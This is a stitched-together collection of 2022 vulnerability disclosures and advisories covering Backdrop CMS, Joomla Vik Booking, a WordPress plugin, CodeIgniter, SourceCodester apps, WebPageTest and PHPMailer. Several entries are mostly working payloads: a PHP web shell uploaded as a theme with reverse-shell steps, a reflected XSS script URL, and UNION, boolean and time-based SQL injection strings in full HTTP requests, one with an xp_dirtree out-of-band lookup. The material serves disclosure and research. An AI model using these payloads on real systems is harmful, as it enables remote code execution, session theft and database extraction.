Backdrop CMS 1.22.0 has Unrestricted File Upload vulnerability via 'themes' that allows attackers to Remote Code Execution.

**Description**

\# An Issue is discovered in Backdrop CMS 1.22.0.

#We found a vulnerability file upload when we upload the malicious file as a theme in the theme installer on the Apperance page.

**Proof of Concept**

First, we login to the target application with admin privileges.

Then select Appearance and select Install new themes.

click Manual Installation.

we can upload with zip files.

so we find themes files at github.

https://github.com/backdrop-contrib/

after that we use simple web shell and zip it to theme files.

<?php system($\_GET\[“cmd”\]); ?>

back too Manual installation and upload zip files.

Installed lateral successfully.

we use gobuster to find which path of themes.

after we know path we can access to the backdoor and execute “whoami” command.

use nc to get our reverse shell.

we use reverse shell payload from this website.

https://revshells.com

Finally execute “powershell” command to create reverse shell connection.

**Author**

Grim The Ripper Team by SOSECURE Thailand

CVE-2022-42092: Backdrop CMS 1.22.0 — Unrestricted File Upload (Themes)

Joomla Vik Booking extension version 1.15.0 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : e4j Extensions for Joomla - extensionsforjoomla.com                        ││  Software : Joomla Vik Booking 1.15.0                                                  ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.php/en/bookingGET parameter 'categories' is vulnerable to XSShttps://extensionsforjoomla.com/livedemo/vikbooking/index.php/en/booking?option=com_vikbooking&task=showprc&roomsnum=1&roomopt%5B%5D=9&adults%5B%5D=2&children%5B%5D=1&days=1&checkin=1665057600&checkout=1665136800&category_id=&categories=rnrtm%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ew3vus&Itemid=103[-] Done

Joomla Vik Booking 1.15.0 Cross Site Scripting

WordPress Zephyr Project Manager plugin version 3.2.42 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Wordpress Plugin Zephyr Project Manager 3.2.42 - Multiple SQLi# Date: 14-08-2022# Exploit Author: Rizacan Tufan# Blog Post: https://rizax.blog/blog/wordpress-plugin-zephyr-project-manager-multiple-sqli-authenticated# Software Link: https://wordpress.org/plugins/zephyr-project-manager/# Vendor Homepage: https://zephyr-one.com/# Version: 3.2.42# Tested on: Windows, Linux# CVE : CVE-2022-2840 (https://wpscan.com/vulnerability/13d8be88-c3b7-4d6e-9792-c98b801ba53c)# DescriptionZephyr Project Manager is a plug-in that helps you manage and get things done effectively, all your projects and tasks.It has been determined that the data coming from the input field in most places throughout the application are used in=20the query without any sanitize and validation.The details of the discovery are given below.# Proof of Concept (PoC)=20The details of the various SQL Injection on the application are given below.## Endpoint of Get Project Data.Sample Request :=20POST /wp-admin/admin-ajax.php HTTP/2Host: vuln.localCookie: ......Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_projectsContent-Type: application/x-www-form-urlencoded; charset=3DUTF-8X-Requested-With: XMLHttpRequestContent-Length: 74Origin: https://vuln.localSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersaction=3Dzpm_view_project&project_id=3D1&zpm_nonce=3D22858bf3a7Payload :=20---Parameter: project_id (POST)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: action=3Dzpm_view_project&project_id=3D1 AND 4923=3D4923&zpm_nonce=3D22858bf3a7    Type: time-based blind    Title: MySQL >=3D 5.0.12 OR time-based blind (query SLEEP)    Payload: action=3Dzpm_view_project&project_id=3D1 OR (SELECT 7464 FROM (SELECT(SLEEP(20)))EtZW)&zpm_nonce=3D22858bf3a7    Type: UNION query    Title: Generic UNION query (NULL) - 20 columns    Payload: action=3Dzpm_view_project&project_id=3D-4909 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71707a7071,0x6264514e6e4944795a6f6e4a786a6e4d4f666255434d6a5553526e43616e52576c75774743434f67,0x71786b6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&zpm_nonce=3D22858bf3a7---## Endpoint of Get Task Data.Sample Request :=20POST /wp-admin/admin-ajax.php HTTP/2Host: vuln.localCookie: ......Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_tasksContent-Type: application/x-www-form-urlencoded; charset=3DUTF-8X-Requested-With: XMLHttpRequestContent-Length: 51Origin: https://vuln.localSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailerstask_id=3D1&action=3Dzpm_view_task&zpm_nonce=3D22858bf3a7Payload :=20---Parameter: task_id (POST)    Type: time-based blind    Title: MySQL >=3D 5.0.12 AND time-based blind (query SLEEP)    Payload: task_id=3D1 AND (SELECT 5365 FROM (SELECT(SLEEP(20)))AdIX)&action=3Dzpm_view_task&zpm_nonce=3D22858bf3a7---## Endpoint of New Task.Sample Request :=20POST /wp-admin/admin-ajax.php HTTP/2Host: vuln.localCookie: ......Referer: https://vuln.local/wp-admin/admin.php?page=3Dzephyr_project_manager_tasksContent-Type: application/x-www-form-urlencoded; charset=3DUTF-8X-Requested-With: XMLHttpRequestContent-Length: 337Origin: https://vuln.localSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailerstask_name=3Dtest&task_description=3Dtest&task_project=3D1&task_due_date=3D&task_start_date=3D&team=3D0&priority=3Dpriority_none&status=3Dtest&type=3Ddefault&recurrence%5Btype%5D=3Ddefault&parent-id=3D-1&action=3Dzpm_new_task&zpm_nonce=3D22858bf3a7Payload :=20---Parameter: task_project (POST)    Type: time-based blind    Title: MySQL >=3D 5.0.12 AND time-based blind (query SLEEP)    Payload: task_name=3Dtest&task_description=3Dtest&task_project=3D1 AND (SELECT 3078 FROM (SELECT(SLEEP(20)))VQSp)&task_due_date=3D&task_start_date=3D&team=3D0&priority=3Dpriority_none&status=3Drrrr-declare-q-varchar-99-set-q-727aho78zk9gcoyi8asqud6osfy9m0io9hx9kz8o-oasti-fy-com-tny-exec-master-dbo-xp-dirtree-q&type=3Ddefault&recurrence[type]=3Ddefault&parent-id=3D-1&action=3Dzpm_new_task&zpm_nonce=3D22858bf3a7---

WordPress Zephyr Project Manager 3.2.42 SQL Injection

An SQL injection vulnerability issue was discovered in Sourcecodester Simple E-Learning System 1.0., in /vcs/classRoom.php?classCode=, classCode.

Permalink

Cannot retrieve contributors at this time

**Simple E-Learning System by oretnom23 has SQL injection**

BUG\_Author：xtxxueyan

vendors: https://www.sourcecodester.com/php-simple-e-learning-system-source-code

Vulnerability File: /vcs/classRoom.php?classCode=

Vulnerability location: /vcs/classRoom.php?classCode=, classCode

dbname = vcs\_db

**time-based blind**

Payload: /vcs/classRoom.php?classCode=-9082' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,sleep(5),NULL-- - // Leak place ---> classCode

**boolean-based blind**

Payload: /vcs/classRoom.php?classCode=class101\_a' AND 6907=6907 AND 'TSIZ'='TSIZ // Leak place ---> classCode

Payload: /vcs/classRoom.php?classCode=class101\_a' AND 6907=6907 AND 'TSIZ'='TSIQ // Leak place ---> classCode

sqlmap can inject it，can query the database in use now

CVE-2022-40872: bug_report/SQLi-1.md at main · xtxxueyan/bug_report

B.C. Institute of Technology CodeIgniter <=3.1.13 is vulnerable to SQL Injection via system\database\DB_query_builder.php.

**Multiple functions of CodeIgniter have SQL injection****Vulnerability Type :**

SQL Injection

**Vulnerability Version :**

3.0rc <= CodeIgniter <= 3.1.13

**Recurring environment:**

*   Windows 10
*   PHP 7.3.4
*   Apache 2.4.39

**Vulnerability Details**

CodeIgniter is an Application Development Framework - a toolkit - for people who build web sites using PHP.

SQL injection exists for multiple functions in CodeIgniter, and the versions involved are 3.0rc to 3.1.13

The functions involved are where()、or\_where()、having()、or\_having()、where\_in()、or\_where\_in()、where\_not\_in()、or\_where\_not\_in()、like()、or\_like()、not\_like() and or\_not\_like().

The functions listed above do not filter the query fields. If the developer obtains the query fields from the client, the attacker can modify the query fields and trigger SQL injection.

**Describe**

    File:
        system\database\DB_query_builder.php
    
    Core Functions:
        protected function _wh($qb_key, $key, $value = NULL, $type = 'AND ', $escape = NULL)    //662
        protected function _where_in($key = NULL, $values = NULL, $not = FALSE, $type = 'AND ', $escape = NULL)   //804
        protected function _like($field, $match = '', $type = 'AND ', $side = 'both', $not = '', $escape = NULL)    //947
    
    _wh() Explain
        //The following section provides the complete function code.
        ${$qb_key} = array('condition' => $prefix.$k, 'value' => $v, 'escape' => $escape);
        _wh() does not filter $k before splicing $prefix and $k. If we can control $k, SQL injection will be triggered.
        _where_in() and _like() have the same situation.
    
    Public Funtions
        Although  _wh()、where_in() and _like() are protected, but CodeIgniter provides some public functions.
        _wh()
            where()
            or_where()
            having()
            or_having()
        _where_in()        
            where_in()
            or_where_in()
            where_not_in()
            or_where_not_in()
        _like()        
            like()
            or_like()
            not_like()
            or_not_like()
    

protected function \_wh($qb\_key, $key, $value = NULL, $type = 'AND ', $escape = NULL)
{
   $qb\_cache\_key = ($qb\_key === 'qb\_having') ? 'qb\_cache\_having' : 'qb\_cache\_where';
   if ( ! is\_array($key))
   {
   	$key = array($key => $value);
   }
   // If the escape value was not set will base it on the global setting
   is\_bool($escape) OR $escape = $this\->\_protect\_identifiers;
   foreach ($key as $k => $v)
   {
   	$prefix = (count($this\->$qb\_key) === 0 && count($this\->$qb\_cache\_key) === 0)
   		? $this\->\_group\_get\_type('')
   		: $this\->\_group\_get\_type($type);
   	if ($v !== NULL)
   	{
   		if ($escape === TRUE)
   		{
   			$v = $this\->escape($v);
   		}
   		if ( ! $this\->\_has\_operator($k))
   		{
   			$k .= ' = ';
   		}
   	}
   	elseif ( ! $this\->\_has\_operator($k))
   	{
   		// value appears not to have been set, assign the test to IS NULL
   		$k .= ' IS NULL';
   	}
   	elseif (preg\_match('/\\s\*(!?=|<>|\\sIS(?:\\s+NOT)?\\s)\\s\*$/i', $k, $match, PREG\_OFFSET\_CAPTURE))
   	{
   		$k = substr($k, 0, $match\[0\]\[1\]).($match\[1\]\[0\] === '=' ? ' IS NULL' : ' IS NOT NULL');
   	}
   	${$qb\_key} = array('condition' => $prefix.$k, 'value' => $v, 'escape' => $escape);
   	$this\->{$qb\_key}\[\] = ${$qb\_key};
   	if ($this\->qb\_caching === TRUE)
   	{
   		$this\->{$qb\_cache\_key}\[\] = ${$qb\_key};
   		$this\->qb\_cache\_exists\[\] = substr($qb\_key, 3);
   	}
   }
   return $this;
}

**Verification(3.1.13)**

    Code Download
        https://github.com/bcit-ci/CodeIgniter/releases/tag/3.1.13
    Apache needs to add the following in .htaccess
        <IfModule mod_rewrite.c>
        Options +FollowSymlinks -Multiviews
        RewriteEngine On
        RewriteCond %{REQUEST_FILENAME} !-d
        RewriteCond %{REQUEST_FILENAME} !-f
        RewriteRule ^(.*)$ index.php?/$1 [QSA,PT,L]
        </IfModule>
    Environment Construction
        The detailed process is omitted, and the final result is as follows.
    

    File Modification
        1. Edit database configuration file application\config\database.php.
        As a test, I used the information schema of mysql system database 'information-schema'.
    

        2. Download the Sql.php file and move it to the application\controllers\ folder.
        Sql.php uses data table 'engines'.
    

    Try SQL Injection
        1. Normal access 
        Query with the field 'ENGINE'.
        Because the query conditions are different, the results are displayed differently.
        http://192.168.37.129:8080/sql/index?val=*&field=ENGINE
    

        2.Malicious access
        SQL injection through fields.
        The 12 functions above all display the database name.
        SQL injection will occur when careless developers use fields sent by the front end.
        http://192.168.37.129:8080/sql/index?val=*&field=ENGINE like '*' union select database(),2,3,4,5,6 -- -
    

  

**Verification(3.0rc)**

  

**Verification(3.1.1)**

CVE-2022-40835: CodeIgniter3.1.13-SQL-Inject/README.md at main · 726232111/CodeIgniter3.1.13-SQL-Inject

Public disclosure, a talk, and a blog post later, the RCE exploit remains unresolved

Public disclosure, a talk, and a blog post later, the RCE exploit remains unresolved

Despite a researcher’s best efforts at disclosure, the maintainers of the WebPageTest project appear to be ignoring a severe remote code execution (RCE) vulnerability.

In a blog post dated September 23, ManoMano researcher Louka “Laluka” Jacques-Chevallier discussed his discovery of a pre-authentication RCE vulnerability in the open source project WebPageTest.

The research has also been the subject of a talk at DEFCON Paris.

Catch up with the latest security research and analysis

Developed by Catchpoint, WebPageTest is a tool dating back to the days of dial-up modems and the 1990s, which has evolved to become a utility to check the speed and performance of website code for optimization purposes.

According to the researcher, this software has been “prone” to security issues in the past, including a lack of updates to code and containers, outdated components which remained unpatched against known vulnerabilities, and the “intensive use of smelly PHP code”.

The latest stable release of WebPageTest, v22.01, was published in October 2021.

Server-side request forgery (SSRF) vulnerabilities, bugs that allow attackers to make successful requests via a server-side application to an unintended location or resource, have been found in WebPageTest in the past.

A newly discovered SSRF flaw was the focus of Laluka’s research.

After examining the software’s source code and carrying out both crawling and fuzzing tests, Laluka discovered an SSRF vulnerability in under 15 minutes. The SSRF was limited to an HTTP scheme, but the underlying code held more surprises for the cybersecurity researcher.

**Under the microscope**

Upon closer inspection Laluka uncovered a range of issues, including PHP code that could trigger a payload by including a slash in a path, file write bugs, and sanitization failures. Eventually, the researcher was able to push a command injection, create a reverse shell, exploit JSON file jobs, and achieve RCE.

It may also be possible to exploit the RCE if the Beanstalkd work queue engine is in use. While not present in default configurations, Laluka says that the SSRF and command injection issues could be exploited to inject a new, malicious job and force the worker to use the file.

The researcher found the first SSRF bug on April 15, and by May 25, verified the full RCE exploit chain. Laluka contacted the vendor on June 15, and although Catchpoint responded, the lines of communication were described as “pretty tedious”.

**‘Open bag’**

Despite providing the technical details of the issue and a video Proof-of-Concept (PoC), the vendor did not respond until July 28, when Catchpoint offered a $300 “big” bounty program reward.

Laluka offered to help with patch validation, but there has been radio silence since. Although he was paid, it’s been over 90 days, and there is still no news on a fix.

“I think that this software can be really helpful for devs and site reliability engineers, but that the codebase isn’t following good practices whatsoever,” Laluka told The Daily Swig. “It’s basically features in a bag – an open bag.”

Catchpoint has not responded to requests for comment from The Daily Swig.

RELATED PHP package manager component Packagist vulnerable to compromise

Critical flaw in open source WebPageTest remains unpatched

A vulnerability was found in SourceCodester Web-Based Student Clearance System. It has been classified as critical. Affected is an unknown function of the file /Admin/login.php of the component POST Parameter Handler. The manipulation of the argument txtusername leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-210246 is the identifier assigned to this vulnerability.

CVE-2022-3414

### Impact
Arbitrary additional email headers can be injected via crafted From or Sender headers.

### Patches
Fixed in 2.2.1

### Workarounds
Filter user-supplied values prior to using them in From or Sender properties.

### References
https://nvd.nist.gov/vuln/detail/CVE-2012-0796

### For more information
If you have any questions or comments about this advisory:
* Open a private issue in [the PHPMailer project](https://github.com/PHPMailer/PHPMailer)

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2012-0796

**PHPMailer vulnerable to email header injection**

High severity GitHub Reviewed Published Oct 6, 2022 in PHPMailer/PHPMailer • Updated Oct 6, 2022

Vulnerability details Dependabot alerts 0

**Package**

composer phpmailer/phpmailer (Composer)

**Affected versions**

< 2.2.1

**Patched versions**

2.2.1

**Description**

**Impact**

Arbitrary additional email headers can be injected via crafted From or Sender headers.

**Patches**

Fixed in 2.2.1

**Workarounds**

Filter user-supplied values prior to using them in From or Sender properties.

**References**

https://nvd.nist.gov/vuln/detail/CVE-2012-0796

**For more information**

If you have any questions or comments about this advisory:

*   Open a private issue in the PHPMailer project

**References**

*   GHSA-398j-f7m7-795j

 Synchro published the maintainer security advisory

Mar 5, 2020

**Severity**

High

**Weaknesses**

CWE-94

**CVE ID**

CVE-2012-0796

**GHSA ID**

GHSA-398j-f7m7-795j

**Source code**

PHPMailer/PHPMailer

Checking history

See something to contribute? Suggest improvements for this vulnerability.

GHSA-398j-f7m7-795j: PHPMailer vulnerable to email header injection

CodeIgniter is a PHP full-stack web framework. In versions prior to 4.2.7 setting `$secure` or `$httponly` value to `true` in `Config\Cookie` is not reflected in `set_cookie()` or `Response::setCookie()`. As a result cookie values are erroneously exposed to scripts. It should be noted that this vulnerability does not affect session cookies. Users are advised to upgrade to v4.2.7 or later. Users unable to upgrade are advised to manually construct their cookies either by setting the options in code or by constructing Cookie objects. Examples of each workaround are available in the linked GHSA.

CodeIgniter

The Cookie Helper file contains functions that assist in working with cookies.

*   Loading this Helper
*   Available Functions

**Loading this Helper**

This helper is loaded using the following code:

**Available Functions**

The following functions are available:

set_cookie(_$name_\[, _$value = ''_\[, _$expire = ''_\[, _$domain = ''_\[, _$path = '/'_\[, _$prefix = ''_\[, _$secure = false_\[, _$httpOnly = false_\[, _$sameSite = ''_\]\]\]\]\]\]\]\])

 

Parameters:

*   **$name** (_mixed_) – Cookie name _or_ associative array of all of the parameters available to this function
*   **$value** (_string_) – Cookie value
*   **$expire** (_int_) – Number of seconds until expiration
*   **$domain** (_string_) – Cookie domain (usually: .yourdomain.com)
*   **$path** (_string_) – Cookie path
*   **$prefix** (_string_) – Cookie name prefix. If '', the default from **app/Config/Cookie.php** is used
*   **$secure** (_bool_) – Whether to only send the cookie through HTTPS. If null, the default from **app/Config/Cookie.php** is used
*   **$httpOnly** (_bool_) – Whether to hide the cookie from JavaScript. If null, the default from **app/Config/Cookie.php** is used
*   **$sameSite** (_string_) – The value for the SameSite cookie parameter. If null, the default from **app/Config/Cookie.php** is used

Return type:

void

Note

Prior to v4.2.7, the default values of $secure and $httpOnly were false due to a bug, and these values from **app/Config/Cookie.php** were never used.

This helper function gives you friendlier syntax to set browser cookies. Refer to the Response Library for a description of its use, as this function is an alias for CodeIgniter\HTTP\Response::setCookie().

get_cookie(_$index_\[, _$xssClean = false_\[, _$prefix = ''_\]\])

 

Parameters:

*   **$index** (_string_) – Cookie name
*   **$xssClean** (_bool_) – Whether to apply XSS filtering to the returned value
*   **$prefix** (_string|null_) – Cookie name prefix. If set to '', the default value from **app/Config/Cookie.php** will be used. If set to null, no prefix

Returns:

The cookie value or null if not found

Return type:

mixed

Note

Since v4.2.1, the third parameter $prefix has been introduced and the behavior has been changed a bit due to a bug fix. See Upgrading for details.

This helper function gives you friendlier syntax to get browser cookies. Refer to the IncomingRequest Library for detailed description of its use, as this function acts very similarly to IncomingRequest::getCookie(), except it will also prepend the Config\Cookie::$prefix that you might’ve set in your **app/Config/Cookie.php** file.

Warning

Using XSS filtering is a bad practice. It does not prevent XSS attacks perfectly. Using esc() with the correct $context in the views is recommended.

delete_cookie(_$name_\[, _$domain = ''_\[, _$path = '/'_\[, _$prefix = ''_\]\]\])

 

Parameters:

*   **$name** (_string_) – Cookie name
*   **$domain** (_string_) – Cookie domain (usually: .yourdomain.com)
*   **$path** (_string_) – Cookie path
*   **$prefix** (_string_) – Cookie name prefix

Return type:

void

Lets you delete a cookie. Unless you’ve set a custom path or other values, only the name of the cookie is needed.

<?php

delete\_cookie('name');

This function is otherwise identical to set_cookie(), except that it does not have the value and expire parameters.

Note

When you use set_cookie(), if the value is set to empty string and the expire is set to 0, the cookie will be deleted. If the value is set to non-empty string and the expire is set to 0, the cookie will only last as long as the browser is open.

You can submit an array of values in the first parameter or you can set discrete parameters.

<?php

delete\_cookie($name, $domain, $path, $prefix);

has_cookie(_string $name_\[, _?string $value = null_\[, _string $prefix = ''_\]\])

 

Parameters:

*   **$name** (_string_) – Cookie name
*   **$value** (_string|null_) – Cookie value
*   **$prefix** (_string_) – Cookie prefix

Return type:

bool

Checks if a cookie exists by name. This is an alias of Response::hasCookie().

CVE-2022-39284: Cookie Helper — CodeIgniter 4.2.7 documentation

Online Leave Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /leave_system/classes/Master.php?f=delete_department.

**Online Leave Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: Yuanbolin

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/14910/online-leave-management-system-php-free-source-code.html

The program is built using the xmapp-php8.1 version

First create a table in the database

CREATE TABLE \`department\_ist\` (
  \`id\` int(11) NOT NULL
) ENGINE\=InnoDB DEFAULT CHARSET\=utf8mb4;
COMMIT;

Vulnerability File: /leave\_system/classes/Master.php?f=delete\_department

Vulnerability location: /leave\_system/classes/Master.php?f=delete\_department,id

dbname=leave\_db,length=8

\[+\] Payload: id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+ // Leak place ---> id

POST /leave\_system/classes/Master.php?f\=delete\_department HTTP/1.1
Host: 192.168.1.19
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.19/leave\_system/admin/?page=maintenance/department
Content-Length: 65
Cookie: PHPSESSID=a58hbbkeelngug4ek0dssb0rb5
Connection: close
id=3' and updatexml(1,concat(0x7e,(select database()),0x7e),0)--+

Tag

#php